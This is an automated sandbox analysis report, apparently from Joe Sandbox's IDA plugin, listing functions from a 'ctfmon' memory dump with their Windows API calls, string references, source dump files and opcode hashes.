Instruction ID: e67e7c9409d6482dbb0cac13eed9dcc457f33c4e76e944be94ce0609059d711d
Opcode Fuzzy Hash: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
Instruction Fuzzy Hash: 80F02B32B055129BC7302F71AC4E5AE3A60EF02771B50017AF842A52F0CFB88CC28A6D

Function 0042527C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00425297
lstrlenW.KERNEL32(00000000), ref: 004252E1
GlobalUnlock.KERNEL32(?), ref: 00425378

Strings

@, xrefs: 004252D5

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Global$LockUnlocklstrlen
String ID: @
API String ID: 1794151802-2766056989
Opcode ID: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
Instruction ID: 56caa2758e9c52820e3943fc16772618d0e7bec53ae05310eb2a7808f0609bc1
Opcode Fuzzy Hash: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
Instruction Fuzzy Hash: 89311A32900616EBCF14DF94D8856AFBBB4FF00354F5485AAD805AB280D3789E46CF98

Function 00427E6A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 00427E76
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00427F25
LoadBitmapW.USER32(00000000,00007FE3), ref: 00427F3D

Strings

, xrefs: 00427E85

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
Instruction ID: 3dac30640d0aaed0d39e7c8ba4964ad4c3cd7e2de72bd744148c463c93ab964f
Opcode Fuzzy Hash: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
Instruction Fuzzy Hash: 0C213772F00225AFDB20CF78DC85BAE7BB8EB44314F4541A6E505EB2C2D7749A058B54

Function 00402AD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000344,00007530), ref: 00402AFA
ResetEvent.KERNEL32(00000344), ref: 00402B07
SetEvent.KERNEL32(00000344), ref: 00402B81

Strings

DW-FI, xrefs: 00402AD8

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Event$ObjectResetSingleWait
String ID: DW-FI
API String ID: 463700304-2755525259
Opcode ID: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
Instruction ID: aee5816b9cca93473e57ae48154deca15eed2f9060ecf18fe0870dd8285205ab
Opcode Fuzzy Hash: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
Instruction Fuzzy Hash: 6A110876600301AFC318DF54EC889A67BB0FB98300F40482CF51563391E778954EDBB2

Function 00412444 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518
WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00416871,?), ref: 0041253D

Strings

qhA, xrefs: 0041245C

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: qhA
API String ID: 352835431-109923292
Opcode ID: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
Instruction ID: ede44e41d23e5143c76023491ad2abd4dbb5e4cc9370e92a33f97a9eab123c69
Opcode Fuzzy Hash: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
Instruction Fuzzy Hash: CB113A32A00549EBCF228F84CE41ADEBBB6EB48750F548156F924B2160D37A8DB1DB58

Function 00426950 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 00426961
GetClassNameW.USER32(00000000,?,0000000A), ref: 0042697C
lstrcmpiW.KERNEL32(?,combobox,?,00407730,00000000), ref: 0042698B

Strings

combobox, xrefs: 00426985

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
Instruction ID: 5a3d263a88e3f3d6520d42c127d3d6d56894c682c1a0552d8ed4dfe0903393cf
Opcode Fuzzy Hash: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
Instruction Fuzzy Hash: 8AE06571754119BBCF11AF64DC4AE6F3B68A701341FA08222B412E51A1DA34E5968A6A

Function 0041466B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040F086), ref: 00414670
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00414680

Strings

KERNEL32, xrefs: 0041466B
IsProcessorFeaturePresent, xrefs: 0041467A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
Instruction ID: e08e1aaa38df6158061f31c1e92fe184261e3872a30fdf9be053d858ffc3e291
Opcode Fuzzy Hash: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
Instruction Fuzzy Hash: 19C01270BC0302E6DA241BF02C99FAA332C0F82B8AF9502B26205E0094CE9DC086903D

Function 0040F130 Relevance: 6.5, APIs: 5, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
Instruction ID: c53f18b298c334f67eaf08f9ae9cc2dd99c59691f0b3e42a7d6712c8fe277865
Opcode Fuzzy Hash: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
Instruction Fuzzy Hash: 24910472D01214AACF31AB69DD40ADF7A78EB55764F20023BFC14B66D1D33A5D848BAC

Function 0041388B Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,00439C00,00439C00,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138AC
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138D0
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138EA
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?), ref: 004139AB
HeapFree.KERNEL32(00000000,00000000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?,00000000), ref: 004139C2

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
Instruction ID: e0fbc1c5489a36fa46b370c331ae166ff60e5c5d4513b139ca63262e897aab2f
Opcode Fuzzy Hash: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
Instruction Fuzzy Hash: F631CFB0640701ABD3308F24DC45BA6BBE4EB44756F10953AE1969B390EBB8A985CB4C

Function 00409473 Relevance: 6.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409478
VariantClear.OLEAUT32(?), ref: 0040952A
CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095C7
CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095D5

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: FreeTask$ClearH_prologVariant
String ID:
API String ID: 82050969-0
Opcode ID: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
Instruction ID: 7a4f58fe1ca51ad8bd86bb919bdeb9b1e6d69dac6bd0573dd5a3036f94321626
Opcode Fuzzy Hash: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
Instruction Fuzzy Hash: A9613C32600601DFCB20DFA5D9C496AB7F6BF48304754497EE146AB7A2CB39EC46CB54

Function 004097AE Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004097CC
GetDesktopWindow.USER32 ref: 004097DF
GetWindowRect.USER32(?,?), ref: 004097F2
GetWindowRect.USER32(?,?), ref: 004097FF

Part of subcall function 004242D8: MoveWindow.USER32(?,?,?,00000000,?,?,?,00409940,?,?,?,?,00000000), ref: 004242F4

Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
Instruction ID: 8b8ab32d8fa83548fa5c41fe31c716bdd51a77ece67491eaac64cceb9160e636
Opcode Fuzzy Hash: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
Instruction Fuzzy Hash: 17512C71A0021AEFCB04DFA9D984DAEB7B9FF89704B60446DF106E72A1C735AD01CB24

Function 00412658 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,0053CB6B,?), ref: 0041271F

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
Instruction ID: 79ff61329588fcd8c51eb6643ed27d011935784b492264ec9ea3890574dd97e0
Opcode Fuzzy Hash: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
Instruction Fuzzy Hash: 8E51D971900108EFCB11CF58C984BDE7BB4FF41350F2045A6E415DB2A1D774DA91CB59

Function 0041EEF0 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041EF36
CallWindowProcA.USER32(00000000), ref: 0041EF61

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
Instruction ID: 8146b5ed783db7286c47fb04c36b5b3a6faea0ea761c2a130bf3399523f472a8
Opcode Fuzzy Hash: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
Instruction Fuzzy Hash: 8C31EB7EB0420477D6209A1AFC859EFB398E78A725F540537FD0593281D32DA9CB826F

Function 0040D7D5 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0053FD88), ref: 0040D819
InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D828
InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D85B
InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D8F3

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
Opcode ID: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
Instruction ID: 58385c7f67a3b939472f6390f75cdd142ca35eef3932e53f8a3f89b6430db689
Opcode Fuzzy Hash: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
Instruction Fuzzy Hash: 2E31F772D04215BFEB222BE1DC45BDB7FA49B01760F10807AF514A62D1CABC49C59B69

Function 00423AF1 Relevance: 6.1, APIs: 4, Instructions: 106windowstringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00423B6A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00423B8E
SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 00423BAE
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00423BCF

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ItemMessageSend$ByteCharMultiWidelstrlen
String ID:
API String ID: 3573766508-0
Opcode ID: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
Instruction ID: de0fd43411457c5723b9be473549cbaf37af971f57f089916a64043c4807ceea
Opcode Fuzzy Hash: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
Instruction Fuzzy Hash: C731D674A00228AADF209F59EC449EBBFB8EB45721F904117F95196291C63C6E42CB29

Function 00417CFB Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
Instruction ID: 0d49b2e9ac122ba47de66c770f7317a9987938b808b70659a99207eb4e60ffc5
Opcode Fuzzy Hash: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
Instruction Fuzzy Hash: 2121183690021EEFCF218F94DC419EEBFB5FF48750F10416AFA1462160C7369962DBA4

Function 0041CD10 Relevance: 6.1, APIs: 4, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041CD4D
SendMessageA.USER32(?,00001944,00000000,?), ref: 0041CD72
SendMessageA.USER32(?,00001943,00000000,?), ref: 0041CD87
RemovePropA.USER32(?,?), ref: 0041CD9D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: MessagePropSend$Remove
String ID:
API String ID: 2793251306-0
Opcode ID: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
Instruction ID: cdf8bf3b115a00345220dc762a3e71ecc87d4dae19ac6484943eac8265a5b6fa
Opcode Fuzzy Hash: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
Instruction Fuzzy Hash: FD11AB796403107AE210AB14AC45FFF775CEB99715F404439FD1496280E27CA94A8BBF

Function 00429870 Relevance: 6.1, APIs: 4, Instructions: 61stringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00429875
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,00000000,00000000,00000000,?,?,00435D10,00000000,?,0042AC21,00000000), ref: 004298E5
lstrcpynW.KERNEL32(0042AC21,00000000,?,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 00429902
LocalFree.KERNEL32(00000000,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 0042990B

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
